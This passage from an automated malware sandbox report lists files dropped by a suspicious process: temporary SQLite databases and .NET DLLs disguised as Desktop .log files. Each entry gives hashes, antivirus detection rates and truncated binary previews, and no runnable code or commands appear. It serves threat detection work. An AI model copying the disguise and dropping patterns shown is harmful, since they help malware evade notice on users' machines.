                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ynlhtOMkLj

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\yxECZfxPPk

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\zAA9O3gEy6

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\zNKCjDFSwz

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\AFgebewE.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38400
                                                                                      Entropy (8bit):5.699005826018714
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      • Antivirus: Virustotal, Detection: 9%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: hT7clR9Gz2.exe, Detection: malicious, Browse
                                                                                      • Filename: 8G3thfOYd2.exe, Detection: malicious, Browse
                                                                                      • Filename: z28NBu7i9a.exe, Detection: malicious, Browse
                                                                                      • Filename: fzUk1a18ai.exe, Detection: malicious, Browse
                                                                                      • Filename: 3BZPHrgjMP.exe, Detection: malicious, Browse
                                                                                      • Filename: 1978044967A8E1C7F632630BC906C6D66B0E64C356345.exe, Detection: malicious, Browse
                                                                                      • Filename: tQxaElvX5D.exe, Detection: malicious, Browse
                                                                                      • Filename: 1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exe, Detection: malicious, Browse
                                                                                      • Filename: 4y2bJd0meT.exe, Detection: malicious, Browse
                                                                                      • Filename: 3b9330b09929cc5391a31e5780a967d26f21b010b586b.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\CHTNxNAz.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 4%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\EMydcNjR.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 10%
                                                                                      • Antivirus: Virustotal, Detection: 24%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\EsydEbLs.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):64000
                                                                                      Entropy (8bit):5.857602289000348
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 4%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\GHBtTNNH.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):41472
                                                                                      Entropy (8bit):5.6808219961645605
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\KxrkaJNA.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):50176
                                                                                      Entropy (8bit):5.723168999026349
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\OnibhGNt.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 20%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                      C:\Users\user\Desktop\PgdUomGa.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):50176
                                                                                      Entropy (8bit):5.723168999026349
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\QpUJDpSo.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34816
                                                                                      Entropy (8bit):5.636032516496583
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      • Antivirus: Virustotal, Detection: 9%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\RMxJvRbT.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38912
                                                                                      Entropy (8bit):5.679286635687991
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 9%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\RUhcZACY.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 10%
                                                                                      • Antivirus: Virustotal, Detection: 24%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\TOksRAfO.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):41472
                                                                                      Entropy (8bit):5.6808219961645605
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\WixjfVXd.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                      C:\Users\user\Desktop\XWBrRjTb.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                      • Antivirus: Virustotal, Detection: 69%, Browse
